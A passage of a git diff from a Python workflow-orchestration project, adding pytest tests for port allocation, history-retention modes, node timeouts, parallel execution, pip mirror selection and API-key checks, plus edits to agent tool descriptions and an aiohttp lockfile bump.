     assert any(call[0][:2] == ["rm", "-f"] for call in docker_calls)
diff --git a/tests/workflow/test_workflow_center_lifecycle.py b/tests/workflow/test_workflow_center_lifecycle.py
index debedef44..cf1046578 100644
--- a/tests/workflow/test_workflow_center_lifecycle.py
+++ b/tests/workflow/test_workflow_center_lifecycle.py
@@ -2,6 +2,7 @@
 
 from __future__ import annotations
 
+import json
 from typing import Any
 
 import pytest
@@ -118,3 +119,122 @@ async def fake_stop_container(container_name: str) -> bool:
     assert "workflow_runtime/wf-1" not in store
     assert "workflow_release/wf-1/active" not in store
     assert store["workflow_release/wf-1/rel-old"]["status"] == "inactive"
+
+
+@pytest.mark.asyncio
+async def test_allocate_port_skips_reserved_service_records(monkeypatch) -> None:
+    """Port allocation must not reuse API/runtime ports that are only visible in storage."""
+    store: dict[str, Any] = {
+        "workflow_api_service/wf-api": {
+            "workflowId": "wf-api",
+            "serviceUrl": "http://127.0.0.1:19000",
+            "invokeUrl": "http://127.0.0.1:19000/invoke",
+            "status": "running",
+        },
+        "workflow_runtime/wf-runtime": {
+            "workflowId": "wf-runtime",
+            "hostPort": 19001,
+            "serviceUrl": "http://127.0.0.1:19001",
+            "status": "active",
+        },
+        "workflow_registry/wf-registry": {
+            "workflowId": "wf-registry",
+            "serviceUrl": "http://127.0.0.1:19002",
+            "publishStatus": "active",
+        },
+    }
+
+    async def fake_list_keys(prefix):
+        return [key for key in store if key.startswith(str(prefix))]
+
+    async def fake_read(key):
+        return store.get(str(key))
+
+    monkeypatch.setenv("FLOCKS_WORKFLOW_SERVICE_PORT_START", "19000")
+    monkeypatch.setenv("FLOCKS_WORKFLOW_SERVICE_PORT_END", "19003")
+    monkeypatch.setattr(center.Storage, "list_keys", fake_list_keys)
+    monkeypatch.setattr(center.Storage, "read", fake_read)
+    monkeypatch.setattr(center, "_is_port_available", lambda _port: True)
+
+    assert await center._allocate_port() == 19003
+
+
+@pytest.mark.asyncio
+async def test_allocate_port_reserves_in_flight_allocations(monkeypatch) -> None:
+    """Back-to-back allocations in one server process must not race to the same port."""
+    center._IN_FLIGHT_PORT_RESERVATIONS.clear()
+
+    async def fake_list_keys(_prefix):
+        return []
+
+    monkeypatch.setenv("FLOCKS_WORKFLOW_SERVICE_PORT_START", "19000")
+    monkeypatch.setenv("FLOCKS_WORKFLOW_SERVICE_PORT_END", "19001")
+    monkeypatch.setattr(center.Storage, "list_keys", fake_list_keys)
+    monkeypatch.setattr(center, "_is_port_available", lambda _port: True)
+
+    try:
+        assert await center._allocate_port() == 19000
+        assert await center._allocate_port() == 19001
+    finally:
+        center._IN_FLIGHT_PORT_RESERVATIONS.clear()
+
+
+@pytest.mark.asyncio
+async def test_publish_workflow_local_releases_reserved_port_on_spawn_failure(
+    monkeypatch,
+    tmp_path,
+) -> None:
+    workflow_id = "wf-local-spawn-fail"
+    workflow_path = tmp_path / "workflow.json"
+    workflow_path.write_text(
+        json.dumps({
+            "id": workflow_id,
+            "start": "n1",
+            "nodes": [{"id": "n1", "type": "python", "code": "outputs['ok'] = True"}],
+            "edges": [],
+        }),
+        encoding="utf-8",
+    )
+    store: dict[str, Any] = {
+        f"workflow_registry/{workflow_id}": {
+            "workflowId": workflow_id,
+            "workflowPath": str(workflow_path),
+            "publishStatus": "unpublished",
+        },
+    }
+
+    async def fake_read(key):
+        return store.get(str(key))
+
+    async def fake_write(key, value):
+        store[str(key)] = value
+
+    async def fake_stop_existing_runtime_for_publish(_workflow_id):
+        return None
+
+    async def fake_write_release_snapshot(_workflow_id, _release_id, _workflow_json):
+        return workflow_path
+
+    async def fake_allocate_port():
+        center._IN_FLIGHT_PORT_RESERVATIONS[19000] = 9999999999.0
+        return 19000
+
+    async def fake_create_subprocess_exec(*_args, **_kwargs):
+        raise OSError("spawn failed")
+
+    center._IN_FLIGHT_PORT_RESERVATIONS.clear()
+    monkeypatch.setattr(center.Storage, "read", fake_read)
+    monkeypatch.setattr(center.Storage, "write", fake_write)
+    monkeypatch.setattr(center, "_stop_existing_runtime_for_publish", fake_stop_existing_runtime_for_publish)
+    monkeypatch.setattr(center, "_write_release_snapshot", fake_write_release_snapshot)
+    monkeypatch.setattr(center, "_allocate_port", fake_allocate_port)
+    monkeypatch.setattr(center.asyncio, "create_subprocess_exec", fake_create_subprocess_exec)
+
+    try:
+        with pytest.raises(center.WorkflowCenterError, match="spawn failed"):
+            await center.publish_workflow_local(workflow_id)
+
+        assert 19000 not in center._IN_FLIGHT_PORT_RESERVATIONS
+        assert store[f"workflow_registry/{workflow_id}"]["publishStatus"] == "failed"
+    finally:
+        center._IN_FLIGHT_PORT_RESERVATIONS.clear()
diff --git a/tests/workflow/test_workflow_fixes.py b/tests/workflow/test_workflow_fixes.py
index 286019116..5b0cddc98 100644
--- a/tests/workflow/test_workflow_fixes.py
+++ b/tests/workflow/test_workflow_fixes.py
@@ -357,8 +357,9 @@ def test_dedup_different_inputs_both_execute(self):
             wf,
             runtime=PythonExecRuntime(),
             stop_on_error=False,
+            history_mode="full",
         )
-        result = engine.run(initial_inputs={})
+        result = engine.run(initial_inputs={}, retain_history=True)
 
         # a -> d (inputs: {x: 1}), b -> d (inputs: {x: 2})
         # Different inputs -> both should execute
@@ -386,8 +387,9 @@ def test_dedup_skips_truly_identical_inputs(self):
             wf,
             runtime=PythonExecRuntime(),
             stop_on_error=False,
+            history_mode="full",
         )
-        result = engine.run(initial_inputs={})
+        result = engine.run(initial_inputs={}, retain_history=True)
 
         # a executes once. b enqueued twice with identical inputs (x=1).
         # Dedup should skip the second execution of b.
diff --git a/tests/workflow/test_workflow_history_mode.py b/tests/workflow/test_workflow_history_mode.py
index 4ebacd36c..87441c5e5 100644
--- a/tests/workflow/test_workflow_history_mode.py
+++ b/tests/workflow/test_workflow_history_mode.py
@@ -34,6 +34,7 @@ def test_run_workflow_summary_history_does_not_retain_large_step_payloads() -> N
         workflow=workflow,
         history_mode="summary",
         ensure_requirements=False,
+        retain_history=True,
     )
 
     assert result.status == "SUCCEEDED"
@@ -50,6 +51,34 @@ def test_run_workflow_summary_history_does_not_retain_large_step_payloads() -> N
     assert result.history[1]["inputs"]["raw_alerts"]["count"] == 200
 
 
+def test_run_workflow_defaults_to_summary_history_mode() -> None:
+    workflow = {
+        "start": "produce",
+        "nodes": [
+            {
+                "id": "produce",
+                "type": "python",
+                "code": "outputs['items'] = [{'body': 'x' * 1000} for _ in range(200)]",
+            },
+        ],
+        "edges": [],
+    }
+
+    result = run_workflow(workflow=workflow, ensure_requirements=False)
+
+    assert result.status == "SUCCEEDED"
+    assert result.history == []
+    assert result.outputs["items"] == {
+        "_type": "list",
+        "count": 200,
+        "preview": [
+            {"_type": "dict", "keys": ["body"]},
+            {"_type": "dict", "keys": ["body"]},
+            {"_type": "dict", "keys": ["body"]},
+        ],
+    }
+
+
 def test_run_workflow_summary_outputs_do_not_retain_large_final_payloads() -> None:
     workflow = {
         "start": "final",
@@ -74,6 +103,30 @@ def test_run_workflow_summary_outputs_do_not_retain_large_final_payloads() -> No
     assert result.outputs["items"]["count"] == 200
 
 
+def test_run_workflow_can_retain_history_when_requested() -> None:
+    workflow = {
+        "start": "produce",
+        "nodes": [
+            {
+                "id": "produce",
+                "type": "python",
+                "code": "outputs['value'] = 1",
+            },
+        ],
+        "edges": [],
+    }
+
+    result = run_workflow(
+        workflow=workflow,
+        ensure_requirements=False,
+        retain_history=True,
+    )
+
+    assert result.status == "SUCCEEDED"
+    assert len(result.history) == 1
+    assert result.history[0]["node_id"] == "produce"
+
+
 def test_python_runtime_can_cleanup_node_globals_after_execute() -> None:
     runtime = PythonExecRuntime(cleanup_globals_after_execute=True)
 
@@ -85,4 +138,3 @@ def test_python_runtime_can_cleanup_node_globals_after_execute() -> None:
     assert outputs == {"ok": True}
     assert "temporary_payload" not in runtime.globals
     assert runtime.globals["outputs"] == {"ok": True}
-
diff --git a/tests/workflow/test_workflow_node_timeout.py b/tests/workflow/test_workflow_node_timeout.py
index 5da9e456c..ffd598a9b 100644
--- a/tests/workflow/test_workflow_node_timeout.py
+++ b/tests/workflow/test_workflow_node_timeout.py
@@ -34,7 +34,7 @@ def test_node_timeout_skips_node_and_records_error():
         node_timeout_s=1.0,
         stop_on_error=False,
     )
-    result = engine.run(initial_inputs={})
+    result = engine.run(initial_inputs={}, retain_history=True)
 
     assert result.steps == 2
     assert len(result.history) == 2
@@ -67,7 +67,7 @@ def test_node_timeout_none_disabled():
         runtime=PythonExecRuntime(),
         node_timeout_s=None,
     )
-    result = engine.run(initial_inputs={})
+    result = engine.run(initial_inputs={}, retain_history=True)
     assert result.steps == 1
     assert result.history[0].outputs["x"] == 1
 
@@ -92,6 +92,7 @@ def test_run_workflow_node_timeout_param():
         inputs={},
         node_timeout_s=0.2,
         ensure_requirements=False,
+        retain_history=True,
     )
     assert result.status == "SUCCEEDED"
     assert len(result.history) == 1
@@ -119,6 +120,7 @@ def test_run_workflow_uses_metadata_node_timeout_default():
         workflow=workflow,
         inputs={},
         ensure_requirements=False,
+        retain_history=True,
     )
     assert result.status == "SUCCEEDED"
     assert len(result.history) == 1
@@ -146,6 +148,7 @@ def test_run_workflow_explicit_node_timeout_overrides_metadata():
         inputs={},
         node_timeout_s=1.0,
         ensure_requirements=False,
+        retain_history=True,
     )
     assert result.status == "SUCCEEDED"
     assert len(result.history) == 1
diff --git a/tests/workflow/test_workflow_parallel.py b/tests/workflow/test_workflow_parallel.py
index fd444ebf4..1207d1a6d 100644
--- a/tests/workflow/test_workflow_parallel.py
+++ b/tests/workflow/test_workflow_parallel.py
@@ -91,7 +91,7 @@ def test_parallel_faster_than_serial(self):
             max_parallel_workers=4,
         )
         t0 = time.perf_counter()
-        result = engine.run()
+        result = engine.run(retain_history=True)
         elapsed = time.perf_counter() - t0
 
         assert result.steps >= 5  # start + 3 workers + end
@@ -108,7 +108,7 @@ def test_serial_fallback_when_workers_1(self):
             max_parallel_workers=1,
         )
         t0 = time.perf_counter()
-        result = engine.run()
+        result = engine.run(retain_history=True)
         elapsed = time.perf_counter() - t0
 
         assert result.steps >= 5
@@ -123,7 +123,7 @@ def test_parallel_results_correct(self):
             runtime=PythonExecRuntime(),
             max_parallel_workers=4,
         )
-        result = engine.run()
+        result = engine.run(retain_history=True)
 
         worker_steps = [s for s in result.history if s.node_id.startswith("worker_")]
         assert len(worker_steps) == 4
@@ -139,7 +139,7 @@ def test_parallel_with_join_node(self):
             runtime=PythonExecRuntime(),
             max_parallel_workers=4,
         )
-        result = engine.run()
+        result = engine.run(retain_history=True)
 
         end_steps = [s for s in result.history if s.node_id == "end"]
         assert len(end_steps) == 1
@@ -165,7 +165,7 @@ def test_single_node_no_parallel_overhead(self):
             runtime=PythonExecRuntime(),
             max_parallel_workers=4,
         )
-        result = engine.run()
+        result = engine.run(retain_history=True)
 
         assert result.steps == 3
         last = result.history[-1]
@@ -201,7 +201,7 @@ def test_parallel_one_node_fails_stop_on_error(self):
         )
         from flocks.workflow.errors import NodeExecutionError
         with pytest.raises(NodeExecutionError, match="boom"):
-            engine.run()
+            engine.run(retain_history=True)
 
     def test_parallel_one_node_fails_continue(self):
         """When stop_on_error=False, other siblings still complete."""
@@ -226,7 +226,7 @@ def test_parallel_one_node_fails_continue(self):
             max_parallel_workers=4,
             stop_on_error=False,
         )
-        result = engine.run()
+        result = engine.run(retain_history=True)
 
         ok_steps = [s for s in result.history if s.error is None and s.node_id.startswith("ok_")]
         assert len(ok_steps) == 2
@@ -344,7 +344,7 @@ def _spy_run_sync(coro):
                     wf,
                     runtime=PythonExecRuntime(),
                     max_parallel_workers=4,
-                ).run()
+                ).run(retain_history=True)
 
             worker_steps = [step for step in result.history if step.node_id.startswith("worker_")]
             assert len(worker_steps) == 3
@@ -383,8 +383,9 @@ def test_dedup_with_parallel_batch(self):
             wf,
             runtime=PythonExecRuntime(),
             max_parallel_workers=4,
+            history_mode="full",
         )
-        result = engine.run()
+        result = engine.run(retain_history=True)
         b_steps = [s for s in result.history if s.node_id == "b"]
         assert len(b_steps) == 1
 
@@ -419,7 +420,7 @@ def test_parallel_timeout_marks_slow_node(self):
             stop_on_error=False,
         )
         t0 = time.perf_counter()
-        result = engine.run()
+        result = engine.run(retain_history=True)
         elapsed = time.perf_counter() - t0
 
         # Should complete near the timeout, not wait for the 5s sleep.
@@ -460,7 +461,7 @@ def test_parallel_timeout_is_non_fatal(self):
             stop_on_error=True,
         )
         # Should NOT raise even though stop_on_error=True, because timeout is non-fatal.
-        result = engine.run()
+        result = engine.run(retain_history=True)
         errors = [s for s in result.history if s.error is not None]
         assert len(errors) == 1
         assert "超时" in errors[0].error
@@ -495,7 +496,7 @@ def test_branch_true_parallel_siblings(self):
             runtime=PythonExecRuntime(),
             max_parallel_workers=4,
         )
-        result = engine.run()
+        result = engine.run(retain_history=True)
 
         executed_ids = [s.node_id for s in result.history]
         assert "a" in executed_ids
diff --git a/tests/workflow/test_workflow_requirements_mirrors.py b/tests/workflow/test_workflow_requirements_mirrors.py
new file mode 100644
index 000000000..0981ba062
--- /dev/null
+++ b/tests/workflow/test_workflow_requirements_mirrors.py
@@ -0,0 +1,87 @@
+from __future__ import annotations
+
+from types import SimpleNamespace
+from typing import Any
+
+from flocks.workflow.requirements import (
+    RequirementsInstaller,
+    SandboxRequirementsInstaller,
+    resolve_python_package_index_url,
+)
+
+
+def test_resolve_python_package_index_uses_chinese_locale(monkeypatch) -> None:
+    monkeypatch.delenv("FLOCKS_WORKFLOW_SERVICE_PIP_INDEX_URL", raising=False)
+    monkeypatch.delenv("FLOCKS_WORKFLOW_REQUIREMENTS_PIP_INDEX_URL", raising=False)
+    monkeypatch.delenv("PIP_INDEX_URL", raising=False)
+    monkeypatch.delenv("UV_INDEX_URL", raising=False)
+    monkeypatch.delenv("UV_DEFAULT_INDEX", raising=False)
+    monkeypatch.delenv("FLOCKS_UPDATE_REGION", raising=False)
+    monkeypatch.setenv("FLOCKS_INSTALL_LANGUAGE", "zh-CN")
+    # The variables deleted above are unset so that (presumably) no explicit override applies; zh-CN alone should yield the Aliyun mirror.
+    assert resolve_python_package_index_url() == "https://mirrors.aliyun.com/pypi/simple"
+
+
+def test_requirements_installer_passes_index_to_pip(monkeypatch, tmp_path) -> None:
+    calls: list[list[str]] = []
+    # Stand-in for subprocess.run: records each command and reports success (returncode 0).
+    def fake_run(cmd: list[str], **_kwargs: Any) -> SimpleNamespace:
+        calls.append(cmd)
+        return SimpleNamespace(returncode=0)
+
+    monkeypatch.setattr("flocks.workflow.requirements.subprocess.run", fake_run)
+    # Run the pip-based installer with an explicit index URL.
+    installed = RequirementsInstaller(
+        installer="pip",
+        cache_dir=tmp_path,
+        index_url="https://mirror.example/simple",
+    ).ensure_installed(["requests==2.32.0"])
+    # Exactly one command is expected; element 0 (presumably the interpreter path) is not compared.
+    assert installed is True
+    assert len(calls) == 1
+    assert calls[0][1:] == [
+        "-m",
+        "pip",
+        "install",
+        "--index-url",
+        "https://mirror.example/simple",
+        "requests==2.32.0",
+    ]
+
+
+def test_sandbox_requirements_installer_passes_index_to_pip(monkeypatch) -> None:
+    calls: list[list[str]] = []
+    # Stand-in for subprocess.run: the first call returns returncode 1, every later call returns 0.
+    def fake_run(cmd: list[str], check: bool = True, **_kwargs: Any) -> SimpleNamespace:
+        calls.append(cmd)
+        if len(calls) == 1:
+            return SimpleNamespace(returncode=1)
+        return SimpleNamespace(returncode=0)
+
+    monkeypatch.setattr("flocks.workflow.requirements.subprocess.run", fake_run)
+    # Run the pip-based sandbox installer with an explicit index URL and a container description.
+    installed = SandboxRequirementsInstaller(
+        installer="pip",
+        index_url="https://mirror.example/simple",
+    ).ensure_installed(
+        ["requests==2.32.0"],
+        sandbox={"container_name": "workflow-container", "container_workdir": "/workspace"},
+    )
+    # The third recorded command is expected to be the `docker exec` pip install carrying --index-url.
+    assert installed is True
+    install_cmd = calls[2]  # NOTE(review): calls[0] and calls[1] are presumably probe/setup commands - confirm against the installer
+    assert install_cmd[:5] == ["docker", "exec", "-i", "-w", "/workspace"]
+    assert install_cmd[5] == "workflow-container"
+    assert install_cmd[6:15] == [
+        "python3",
+        "-m",
+        "pip",
+        "install",
+        "--disable-pip-version-check",
+        "--no-cache-dir",
+        "--target",
+        "/workspace/.flocks/workflow/site-packages",
+        "--index-url",
+    ]
+    assert install_cmd[15:17] == ["https://mirror.example/simple", "requests==2.32.0"]
diff --git a/tests/workflow/test_workflow_service_runtime.py b/tests/workflow/test_workflow_service_runtime.py
index 82da67ca4..c63c93295 100644
--- a/tests/workflow/test_workflow_service_runtime.py
+++ b/tests/workflow/test_workflow_service_runtime.py
@@ -123,3 +123,55 @@ def test_service_runtime_invoke_builds_real_tool_context(
     )
     run_workflow_mock.assert_called_once()
     assert run_workflow_mock.call_args.kwargs["tool_context"] is tool_context
+
+
+def test_service_runtime_requires_api_key_when_configured(
+    monkeypatch,
+) -> None:
+    init_mock = AsyncMock()
+    shutdown_mock = AsyncMock()
+    manager = SimpleNamespace(shutdown=shutdown_mock)
+    tool_context = ToolContext(session_id="session-1", message_id="message-1", agent="rex")
+    build_context_mock = AsyncMock(return_value=tool_context)
+    run_workflow_mock = Mock(
+        return_value=SimpleNamespace(
+            status="SUCCEEDED",
+            run_id="run-1",
+            outputs={"ok": True},
+            error=None,
+        )
+    )
+    # Swap MCP.init, get_manager, build_workflow_tool_context and run_workflow for the mocks above.
+    monkeypatch.setattr(service_runtime.MCP, "init", init_mock)
+    monkeypatch.setattr(service_runtime, "get_manager", lambda: manager)
+    monkeypatch.setattr(service_runtime, "build_workflow_tool_context", build_context_mock)
+    monkeypatch.setattr(service_runtime, "run_workflow", run_workflow_mock)
+    # Build the service app with an API key configured.
+    app = service_runtime.create_service_app(
+        workflow_json={"id": "wf-1", "start": "node-1", "nodes": [], "edges": []},
+        workflow_id="wf-1",
+        release_id="rel-1",
+        api_key="secret-key",
+    )
+    # Issue three /invoke requests: no key, a wrong x-api-key header, and the configured key.
+    with TestClient(app, raise_server_exceptions=True) as client:
+        missing = client.post("/invoke", json={"inputs": {"ip": "8.8.8.8"}})
+        wrong = client.post(
+            "/invoke",
+            json={"inputs": {"ip": "8.8.8.8"}},
+            headers={"x-api-key": "wrong-key"},
+        )
+        allowed = client.post(
+            "/invoke",
+            json={"inputs": {"ip": "8.8.8.8"}},
+            headers={"x-api-key": "secret-key"},
+        )
+    # Both rejected requests must return 401; the mocks must have been used exactly once (by the valid request).
+    assert missing.status_code == 401
+    assert wrong.status_code == 401
+    assert missing.json()["detail"] == "Invalid API key"
+    assert wrong.json()["detail"] == "Invalid API key"
+    assert allowed.status_code == 200
+    assert allowed.json()["status"] == "SUCCEEDED"
+    build_context_mock.assert_awaited_once()
+    run_workflow_mock.assert_called_once()
diff --git a/tui/flocks/tool/glob.txt b/tui/flocks/tool/glob.txt
index 627da6cae..add6b6ee1 100644
--- a/tui/flocks/tool/glob.txt
+++ b/tui/flocks/tool/glob.txt
@@ -3,4 +3,4 @@
 - Returns matching file paths sorted by modification time
 - Use this tool when you need to find files by name patterns
 - When you are doing an open-ended search that may require multiple rounds of globbing and grepping, use the Task tool instead
-- You have the capability to call multiple tools in a single response. It is always better to speculatively perform multiple searches as a batch that are potentially useful.
+- You may call multiple independent tools in the same response. Prefer separate parallel Glob calls when multiple searches are likely to be useful.
diff --git a/tui/flocks/tool/read.txt b/tui/flocks/tool/read.txt
index b5bffee26..31b79f7bc 100644
--- a/tui/flocks/tool/read.txt
+++ b/tui/flocks/tool/read.txt
@@ -7,6 +7,6 @@ Usage:
 - You can optionally specify a line offset and limit (especially handy for long files), but it's recommended to read the whole file by not providing these parameters
 - Any lines longer than 2000 characters will be truncated
 - Results are returned using cat -n format, with line numbers starting at 1
-- You have the capability to call multiple tools in a single response. It is always better to speculatively read multiple files as a batch that are potentially useful.
+- You may call multiple independent tools in the same response. Prefer separate parallel Read calls when multiple files are likely to be useful.
 - If you read a file that exists but has empty contents you will receive a system reminder warning in place of file contents.
 - You can read image files using this tool.
diff --git a/uv.lock b/uv.lock
index 7a104edaf..02ef844ca 100644
--- a/uv.lock
+++ b/uv.lock
@@ -26,7 +26,7 @@ wheels = [
 
 [[package]]
 name = "aiohttp"
-version = "3.13.3"
+version = "3.13.5"
 source = { registry = "https://pypi.org/simple" }
 dependencies = [
     { name = "aiohappyeyeballs" },
@@ -37,25 +37,25 @@ dependencies = [
     { name = "propcache" },
     { name = "yarl" },
 ]
-sdist = { url = "https://files.pythonhosted.org/packages/50/42/32cf8e7704ceb4481406eb87161349abb46a57fee3f008ba9cb610968646/aiohttp-3.13.3.tar.gz", hash = "sha256:a949eee43d3782f2daae4f4a2819b2cb9b0c5d3b7f7a927067cc84dafdbb9f88", size = 7844556, upload-time = "2026-01-03T17:33:05.204Z" }
+sdist = { url = "https://files.pythonhosted.org/packages/77/9a/152096d4808df8e4268befa55fba462f440f14beab85e8ad9bf990516918/aiohttp-3.13.5.tar.gz", hash = "sha256:9d98cc980ecc96be6eb4c1994ce35d28d8b1f5e5208a23b421187d1209dbb7d1", size = 7858271, upload-time = "2026-03-31T22:01:03.343Z" }
 wheels = [
-    { url = "https://files.pythonhosted.org/packages/a0/be/4fc11f202955a69e0db803a12a062b8379c970c7c84f4882b6da17337cc1/aiohttp-3.13.3-cp312-cp312-macosx_10_13_universal2.whl", hash = "sha256:b903a4dfee7d347e2d87697d0713be59e0b87925be030c9178c5faa58ea58d5c", size = 739732, upload-time = "2026-01-03T17:30:14.23Z" },
-    { url = "https://files.pythonhosted.org/packages/97/2c/621d5b851f94fa0bb7430d6089b3aa970a9d9b75196bc93bb624b0db237a/aiohttp-3.13.3-cp312-cp312-macosx_10_13_x86_64.whl", hash = "sha256:a45530014d7a1e09f4a55f4f43097ba0fd155089372e105e4bff4ca76cb1b168", size = 494293, upload-time = "2026-01-03T17:30:15.96Z" },
-    { url = "https://files.pythonhosted.org/packages/5d/43/4be01406b78e1be8320bb8316dc9c42dbab553d281c40364e0f862d5661c/aiohttp-3.13.3-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:27234ef6d85c914f9efeb77ff616dbf4ad2380be0cda40b4db086ffc7ddd1b7d", size = 493533, upload-time = "2026-01-03T17:30:17.431Z" },
-    { url = "https://files.pythonhosted.org/packages/8d/a8/5a35dc56a06a2c90d4742cbf35294396907027f80eea696637945a106f25/aiohttp-3.13.3-cp312-cp312-manylinux2014_aarch64.manylinux_2_17_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:d32764c6c9aafb7fb55366a224756387cd50bfa720f32b88e0e6fa45b27dcf29", size = 1737839, upload-time = "2026-01-03T17:30:19.422Z" },
-    { url = "https://files.pythonhosted.org/packages/bf/62/4b9eeb331da56530bf2e198a297e5303e1c1ebdceeb00fe9b568a65c5a0c/aiohttp-3.13.3-cp312-cp312-manylinux2014_armv7l.manylinux_2_17_armv7l.manylinux_2_31_armv7l.whl", hash = "sha256:b1a6102b4d3ebc07dad44fbf07b45bb600300f15b552ddf1851b5390202ea2e3", size = 1703932, upload-time = "2026-01-03T17:30:21.756Z" },
-    { url = "https://files.pythonhosted.org/packages/7c/f6/af16887b5d419e6a367095994c0b1332d154f647e7dc2bd50e61876e8e3d/aiohttp-3.13.3-cp312-cp312-manylinux2014_ppc64le.manylinux_2_17_ppc64le.manylinux_2_28_ppc64le.whl", hash = "sha256:c014c7ea7fb775dd015b2d3137378b7be0249a448a1612268b5a90c2d81de04d", size = 1771906, upload-time = "2026-01-03T17:30:23.932Z" },
-    { url = "https://files.pythonhosted.org/packages/ce/83/397c634b1bcc24292fa1e0c7822800f9f6569e32934bdeef09dae7992dfb/aiohttp-3.13.3-cp312-cp312-manylinux2014_s390x.manylinux_2_17_s390x.manylinux_2_28_s390x.whl", hash = "sha256:2b8d8ddba8f95ba17582226f80e2de99c7a7948e66490ef8d947e272a93e9463", size = 1871020, upload-time = "2026-01-03T17:30:26Z" },
-    { url = "https://files.pythonhosted.org/packages/86/f6/a62cbbf13f0ac80a70f71b1672feba90fdb21fd7abd8dbf25c0105fb6fa3/aiohttp-3.13.3-cp312-cp312-manylinux2014_x86_64.manylinux_2_17_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:9ae8dd55c8e6c4257eae3a20fd2c8f41edaea5992ed67156642493b8daf3cecc", size = 1755181, upload-time = "2026-01-03T17:30:27.554Z" },
-    { url = "https://files.pythonhosted.org/packages/0a/87/20a35ad487efdd3fba93d5843efdfaa62d2f1479eaafa7453398a44faf13/aiohttp-3.13.3-cp312-cp312-manylinux_2_31_riscv64.manylinux_2_39_riscv64.whl", hash = "sha256:01ad2529d4b5035578f5081606a465f3b814c542882804e2e8cda61adf5c71bf", size = 1561794, upload-time = "2026-01-03T17:30:29.254Z" },
-    { url = "https://files.pythonhosted.org/packages/de/95/8fd69a66682012f6716e1bc09ef8a1a2a91922c5725cb904689f112309c4/aiohttp-3.13.3-cp312-cp312-musllinux_1_2_aarch64.whl", hash = "sha256:bb4f7475e359992b580559e008c598091c45b5088f28614e855e42d39c2f1033", size = 1697900, upload-time = "2026-01-03T17:30:31.033Z" },
-    { url = "https://files.pythonhosted.org/packages/e5/66/7b94b3b5ba70e955ff597672dad1691333080e37f50280178967aff68657/aiohttp-3.13.3-cp312-cp312-musllinux_1_2_armv7l.whl", hash = "sha256:c19b90316ad3b24c69cd78d5c9b4f3aa4497643685901185b65166293d36a00f", size = 1728239, upload-time = "2026-01-03T17:30:32.703Z" },
-    { url = "https://files.pythonhosted.org/packages/47/71/6f72f77f9f7d74719692ab65a2a0252584bf8d5f301e2ecb4c0da734530a/aiohttp-3.13.3-cp312-cp312-musllinux_1_2_ppc64le.whl", hash = "sha256:96d604498a7c782cb15a51c406acaea70d8c027ee6b90c569baa6e7b93073679", size = 1740527, upload-time = "2026-01-03T17:30:34.695Z" },
-    { url = "https://files.pythonhosted.org/packages/fa/b4/75ec16cbbd5c01bdaf4a05b19e103e78d7ce1ef7c80867eb0ace42ff4488/aiohttp-3.13.3-cp312-cp312-musllinux_1_2_riscv64.whl", hash = "sha256:084911a532763e9d3dd95adf78a78f4096cd5f58cdc18e6fdbc1b58417a45423", size = 1554489, upload-time = "2026-01-03T17:30:36.864Z" },
-    { url = "https://files.pythonhosted.org/packages/52/8f/bc518c0eea29f8406dcf7ed1f96c9b48e3bc3995a96159b3fc11f9e08321/aiohttp-3.13.3-cp312-cp312-musllinux_1_2_s390x.whl", hash = "sha256:7a4a94eb787e606d0a09404b9c38c113d3b099d508021faa615d70a0131907ce", size = 1767852, upload-time = "2026-01-03T17:30:39.433Z" },
-    { url = "https://files.pythonhosted.org/packages/9d/f2/a07a75173124f31f11ea6f863dc44e6f09afe2bca45dd4e64979490deab1/aiohttp-3.13.3-cp312-cp312-musllinux_1_2_x86_64.whl", hash = "sha256:87797e645d9d8e222e04160ee32aa06bc5c163e8499f24db719e7852ec23093a", size = 1722379, upload-time = "2026-01-03T17:30:41.081Z" },
-    { url = "https://files.pythonhosted.org/packages/3c/4a/1a3fee7c21350cac78e5c5cef711bac1b94feca07399f3d406972e2d8fcd/aiohttp-3.13.3-cp312-cp312-win32.whl", hash = "sha256:b04be762396457bef43f3597c991e192ee7da460a4953d7e647ee4b1c28e7046", size = 428253, upload-time = "2026-01-03T17:30:42.644Z" },
-    { url = "https://files.pythonhosted.org/packages/d9/b7/76175c7cb4eb73d91ad63c34e29fc4f77c9386bba4a65b53ba8e05ee3c39/aiohttp-3.13.3-cp312-cp312-win_amd64.whl", hash = "sha256:e3531d63d3bdfa7e3ac5e9b27b2dd7ec9df3206a98e0b3445fa906f233264c57", size = 455407, upload-time = "2026-01-03T17:30:44.195Z" },
+    { url = "https://files.pythonhosted.org/packages/be/6f/353954c29e7dcce7cf00280a02c75f30e133c00793c7a2ed3776d7b2f426/aiohttp-3.13.5-cp312-cp312-macosx_10_13_universal2.whl", hash = "sha256:023ecba036ddd840b0b19bf195bfae970083fd7024ce1ac22e9bba90464620e9", size = 748876, upload-time = "2026-03-31T21:57:36.319Z" },
+    { url = "https://files.pythonhosted.org/packages/f5/1b/428a7c64687b3b2e9cd293186695affc0e1e54a445d0361743b231f11066/aiohttp-3.13.5-cp312-cp312-macosx_10_13_x86_64.whl", hash = "sha256:15c933ad7920b7d9a20de151efcd05a6e38302cbf0e10c9b2acb9a42210a2416", size = 499557, upload-time = "2026-03-31T21:57:38.236Z" },
+    { url = "https://files.pythonhosted.org/packages/29/47/7be41556bfbb6917069d6a6634bb7dd5e163ba445b783a90d40f5ac7e3a7/aiohttp-3.13.5-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:ab2899f9fa2f9f741896ebb6fa07c4c883bfa5c7f2ddd8cf2aafa86fa981b2d2", size = 500258, upload-time = "2026-03-31T21:57:39.923Z" },
+    { url = "https://files.pythonhosted.org/packages/67/84/c9ecc5828cb0b3695856c07c0a6817a99d51e2473400f705275a2b3d9239/aiohttp-3.13.5-cp312-cp312-manylinux2014_aarch64.manylinux_2_17_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:a60eaa2d440cd4707696b52e40ed3e2b0f73f65be07fd0ef23b6b539c9c0b0b4", size = 1749199, upload-time = "2026-03-31T21:57:41.938Z" },
+    { url = "https://files.pythonhosted.org/packages/f0/d3/3c6d610e66b495657622edb6ae7c7fd31b2e9086b4ec50b47897ad6042a9/aiohttp-3.13.5-cp312-cp312-manylinux2014_armv7l.manylinux_2_17_armv7l.manylinux_2_31_armv7l.whl", hash = "sha256:55b3bdd3292283295774ab585160c4004f4f2f203946997f49aac032c84649e9", size = 1721013, upload-time = "2026-03-31T21:57:43.904Z" },
